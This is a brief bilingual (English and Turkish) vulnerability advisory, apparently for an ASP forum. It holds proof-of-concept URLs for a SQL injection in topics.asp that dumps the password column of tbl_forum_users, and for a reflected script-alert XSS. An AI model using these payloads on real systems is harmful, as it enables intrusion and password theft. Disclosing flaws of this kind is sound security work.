ENGLISH
SQL INJECTİON--------------------------------------------------------
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E
%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
TURKISH
SQL INJECTİON--------------------------------------------------------
Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E
%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı
çıkarıcaktır.
Açıklama:
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu
çalıştırılabilmektedir.
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları
çalışabilmektedir.